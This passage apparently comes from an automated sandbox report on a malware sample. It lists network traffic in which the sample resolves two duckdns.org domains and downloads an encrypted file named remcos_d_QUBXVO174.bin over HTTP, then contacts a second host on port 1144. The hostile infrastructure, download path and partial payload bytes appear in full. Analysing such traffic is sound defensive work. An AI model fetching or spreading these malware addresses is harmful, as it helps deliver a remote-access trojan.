              Sep 27, 2021 14:57:48.260818958 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.260821104 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.260845900 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.260869980 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.260915995 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.260958910 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.260967970 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261008978 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261014938 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261038065 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261054039 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261059046 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261085033 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261408091 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261436939 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261466026 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261487961 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261490107 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261557102 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261605978 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261643887 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261691093 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261766911 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261795044 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261820078 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261835098 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261842966 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261866093 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261868000 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261888981 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261909008 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261912107 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261936903 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261951923 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.261970997 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.261979103 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262001038 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262001991 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262021065 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262028933 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262058020 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262089968 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262111902 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262140036 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262166023 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262181044 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262187958 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262207031 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262217045 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262238979 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262239933 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262264013 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262264967 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262293100 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262320042 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262356997 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262381077 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262401104 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262433052 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262471914 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262490988 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262512922 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262533903 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262553930 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262557983 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262576103 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262599945 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262603045 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262633085 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262640953 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262667894 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262681007 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262698889 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262722015 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262746096 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262768030 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262816906 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262824059 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262845039 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262865067 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262872934 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262885094 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262907028 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262917042 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262928963 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262948990 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262955904 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262983084 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263019085 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263021946 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263061047 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263067007 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263087034 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263107061 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263139963 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263236046 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263262033 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263277054 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263298988 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263312101 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263320923 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263343096 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263364077 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263365030 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263391018 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263396978 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263415098 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263437033 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263438940 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263462067 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263483047 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263485909 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263509035 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263513088 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263531923 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263554096 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263554096 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263602018 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263658047 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263681889 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263704062 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263709068 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263758898 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263758898 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263783932 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263801098 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263839006 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263845921 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263881922 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263894081 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263923883 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263952971 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263978958 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264036894 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264038086 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.264060974 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264079094 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.264117956 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.264147997 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264172077 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264194965 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264194965 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.264213085 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264225960 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.264257908 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.371248007 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371284008 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371545076 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.371772051 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371800900 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371824026 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371843100 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371861935 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371881962 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371896029 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.371905088 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371928930 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371952057 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371967077 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.371973038 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371994972 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372015953 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372025013 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.372082949 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.372613907 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372637987 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372653961 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372697115 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372709990 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.372714996 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372777939 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372798920 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372812033 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.372816086 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372836113 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372855902 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372874975 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.372878075 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372899055 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372927904 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.372987986 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373106003 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373130083 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373150110 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373171091 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373191118 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373203993 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373212099 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373236895 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373258114 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373280048 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373320103 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373363018 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373389006 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373452902 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373454094 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373478889 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373500109 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373522997 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373523951 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373544931 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373589993 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373631001 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373656988 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373682022 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373718023 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373739958 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373754025 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373778105 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373800039 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373815060 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373819113 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373837948 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373857021 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373876095 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373919964 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373986006 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373986959 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374011040 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374031067 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374052048 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374068022 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374070883 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374092102 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374115944 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374138117 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374166012 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374243021 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374289036 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374308109 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374324083 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374346018 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374367952 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374368906 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374388933 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374411106 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374433041 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374481916 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374485970 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374509096 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374599934 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374618053 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374640942 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374660015 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374708891 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374757051 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.637094021 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:48.749043941 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:48.749847889 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:48.776447058 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:48.898894072 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:48.940921068 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:49.053284883 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:49.065982103 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:49.238023043 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:49.238194942 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:49.395836115 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:49.512489080 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:49.515093088 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:49.686646938 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:59.527451992 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:59.530904055 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:59.699342012 CEST11444989323.146.241.70192.168.2.7

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 27, 2021 14:53:40.019715071 CEST5183753192.168.2.78.8.8.8
              Sep 27, 2021 14:53:40.038727045 CEST53518378.8.8.8192.168.2.7
              Sep 27, 2021 14:53:56.642399073 CEST5541153192.168.2.78.8.8.8
              Sep 27, 2021 14:53:56.714075089 CEST53554118.8.8.8192.168.2.7
              Sep 27, 2021 14:54:13.171747923 CEST6366853192.168.2.78.8.8.8
              Sep 27, 2021 14:54:13.185282946 CEST53636688.8.8.8192.168.2.7
              Sep 27, 2021 14:54:49.375288963 CEST5464053192.168.2.78.8.8.8
              Sep 27, 2021 14:54:49.444178104 CEST53546408.8.8.8192.168.2.7
              Sep 27, 2021 14:54:50.523938894 CEST5873953192.168.2.78.8.8.8
              Sep 27, 2021 14:54:50.603393078 CEST53587398.8.8.8192.168.2.7
              Sep 27, 2021 14:54:51.122011900 CEST6033853192.168.2.78.8.8.8
              Sep 27, 2021 14:54:51.135569096 CEST53603388.8.8.8192.168.2.7
              Sep 27, 2021 14:54:51.475680113 CEST5871753192.168.2.78.8.8.8
              Sep 27, 2021 14:54:51.488689899 CEST53587178.8.8.8192.168.2.7
              Sep 27, 2021 14:54:52.002674103 CEST5976253192.168.2.78.8.8.8
              Sep 27, 2021 14:54:52.083827972 CEST53597628.8.8.8192.168.2.7
              Sep 27, 2021 14:54:52.514565945 CEST5432953192.168.2.78.8.8.8
              Sep 27, 2021 14:54:52.528856993 CEST53543298.8.8.8192.168.2.7
              Sep 27, 2021 14:54:52.560240030 CEST5805253192.168.2.78.8.8.8
              Sep 27, 2021 14:54:52.589730978 CEST53580528.8.8.8192.168.2.7
              Sep 27, 2021 14:54:53.090322018 CEST5400853192.168.2.78.8.8.8
              Sep 27, 2021 14:54:53.103915930 CEST53540088.8.8.8192.168.2.7
              Sep 27, 2021 14:54:53.760950089 CEST5945153192.168.2.78.8.8.8
              Sep 27, 2021 14:54:53.774543047 CEST53594518.8.8.8192.168.2.7
              Sep 27, 2021 14:54:54.595487118 CEST5291453192.168.2.78.8.8.8
              Sep 27, 2021 14:54:54.609592915 CEST53529148.8.8.8192.168.2.7
              Sep 27, 2021 14:54:55.214437008 CEST6456953192.168.2.78.8.8.8
              Sep 27, 2021 14:54:55.274261951 CEST53645698.8.8.8192.168.2.7
              Sep 27, 2021 14:55:01.889481068 CEST5281653192.168.2.78.8.8.8
              Sep 27, 2021 14:55:01.909058094 CEST53528168.8.8.8192.168.2.7
              Sep 27, 2021 14:55:34.090076923 CEST5078153192.168.2.78.8.8.8
              Sep 27, 2021 14:55:34.103554964 CEST53507818.8.8.8192.168.2.7
              Sep 27, 2021 14:55:34.227729082 CEST5423053192.168.2.78.8.8.8
              Sep 27, 2021 14:55:34.241355896 CEST53542308.8.8.8192.168.2.7
              Sep 27, 2021 14:56:09.455324888 CEST5491153192.168.2.78.8.8.8
              Sep 27, 2021 14:56:09.470839977 CEST53549118.8.8.8192.168.2.7
              Sep 27, 2021 14:57:47.200725079 CEST4995853192.168.2.78.8.8.8
              Sep 27, 2021 14:57:47.315552950 CEST53499588.8.8.8192.168.2.7
              Sep 27, 2021 14:57:48.519510984 CEST5086053192.168.2.78.8.8.8
              Sep 27, 2021 14:57:48.635026932 CEST53508608.8.8.8192.168.2.7

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Sep 27, 2021 14:57:47.200725079 CEST192.168.2.78.8.8.80xd3d3Standard query (0)dypage.duckdns.orgA (IP address)IN (0x0001)
              Sep 27, 2021 14:57:48.519510984 CEST192.168.2.78.8.8.80xe898Standard query (0)dyn-wave.duckdns.orgA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Sep 27, 2021 14:57:47.315552950 CEST8.8.8.8192.168.2.70xd3d3No error (0)dypage.duckdns.org23.146.242.85A (IP address)IN (0x0001)
              Sep 27, 2021 14:57:48.635026932 CEST8.8.8.8192.168.2.70xe898No error (0)dyn-wave.duckdns.org23.146.241.70A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • dypage.duckdns.org

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.74989223.146.242.8580C:\Users\user\Desktop\DW1VgsgHNU.exe
              TimestampkBytes transferredDirectionData
              Sep 27, 2021 14:57:47.465127945 CEST8143OUTGET /remcos_d_QUBXVO174.bin HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
              Host: dypage.duckdns.org
              Cache-Control: no-cache
              Sep 27, 2021 14:57:47.578341961 CEST8144INHTTP/1.1 200 OK
              Content-Type: application/octet-stream
              Last-Modified: Sun, 26 Sep 2021 08:30:43 GMT
              Accept-Ranges: bytes
              ETag: "119daccbb0b2d71:0"
              Server: Microsoft-IIS/8.5
              Date: Mon, 27 Sep 2021 12:57:47 GMT
              Content-Length: 469056
              Data Raw: 85 72 65 da fa 84 5d ef 15 48 c7 41 95 63 98 4c 63 5c 6a c2 3d 2e 3a e3 ec 0a 1a e6 db fd dd c6 fc 00 3b 08 52 f8 0f c5 51 c6 12 00 b4 f2 2d 4e 7c 5c d4 19 c5 66 d6 f6 9f 3d 55 40 d3 5a 1a 51 5a d4 5a b4 d7 4e 5d 9c c8 d6 64 64 7a 23 4e b3 10 1b 3f a3 f8 15 94 93 f4 27 de 3a 43 d1 26 a4 f0 36 5e ef 78 e6 dd 4b 1f 40 e0 5b 05 12 8e e3 b3 6a a2 48 8d fe 13 86 0f 01 3b e4 e7 fd 24 3b ff 58 78 e6 91 3f 5c 9d 54 a0 ce 0d 92 64 eb 2a a5 20 4e 5b af bc 28 bf fd 7a be ad ff 17 f6 14 28 9a 4e e8 85 5c 75 ba f0 cb c4 71 50 13 15 48 bb a5 eb 21 ea 51 9b 09 ed 8f 8a 15 22 80 64 de 02 97 bf eb 22 b7 53 85 85 5a ef 47 43 0f 28 50 b0 b6 89 91 4a ee da 68 54 01 3a 07 44 0b 84 c7 5d 03 b4 2c d3 60 48 3a 57 8a 60 f0 13 1b 25 b2 dd 4f 24 c9 5c d8 f8 1a 16 55 10 a7 0e b2 54 2f a0 98 39 61 7b f9 b4 7c f8 42 d5 70 8f e6 76 71 ef 68 15 89 cd 1e 6d c2 b9 63 39 60 81 3b 84 83 e6 65 a4 60 1c f9 40 62 30 ec 9b 64 2f 73 33 54 d5 d7 b0 18 f1 a5 0d ac f0 83 ad 9f 76 4d 5d b4 c2 61 85 30 38 73 17 4b a0 a1 b5 65 79 f0 61 e1 60 a1 1e d1 24 bd b4 05 19 90 e9 05 d7 44 28 e4 97 cd ac fc aa 02 9f 88 c3 a4 c3 72 50 c0 fb d6 27 91 93 b6 64 e7 f7 e7 5d b9 e7 98 74 69 ba 95 5e 8b b2 e6 26 eb 31 e7 d8 dd 04 f3 55 41 c1 a2 41 92 b2 9e 38 57 6f 03 59 51 3c 1c 24 99 eb 85 2d 95 35 b2 95 38 b4 f4 5d 94 d2 1d de 01 ad cd 3b cd f0 c3 c1 7c cd ac e1 25 d4 79 b4 d3 9f 42 16 8c 4f 82 14 1d cd cf 60 8b f5 35 b4 40 ad 45 eb 32 6c 64 9a 18 41 3a 7c ce a2 35 9e 80 48 d5 d8 4b 8f 6d 11 8b 11 1f dc 9c 34 8c 45 89 b9 da 0b 2d d3 5f 03 2f 66 57 90 b3 e5 a2 3e 8f db af 0c 26 ed 66 f2 8b 4d 0d be 3c 01 c0 bf 4a cf 3b d0 a2 24 27 c7 e2 f3 f7 6c cc c5 4f 95 fc 69 f4 6a 33 21 ae 79 46 9f 63 df c5 d9 35 fd 2d 91 95 fa be eb 65 d4 8e 88 e0 49 61 c8 e5 c1 64 11 56 d2 78 da 5a a0 ef fe fb d1 e7 99 25 8e 71 ac 71 67 5f ac 3b a4 01 98 3b af 3a 18 4a e4 d1 09 01 df 3d 19 a6 2e 59 36 06 18 54 61 eb f4 7c 87 8f bf 74 1d 6e 45 de e3 8f c9 1d e8 64 86 8c c7 3f dc 31 83 17 1d a6 3a d1 d7 f7 1e 7f c5 f6 0f 47 9e fe e7 1c f6 9e fd 3e 12 b3 cb 57 60 c0 45 25 5f fb 5a 3d 19 ce a8 92 df 6b a1 6e 22 77 86 43 ec 70 7c 59 19 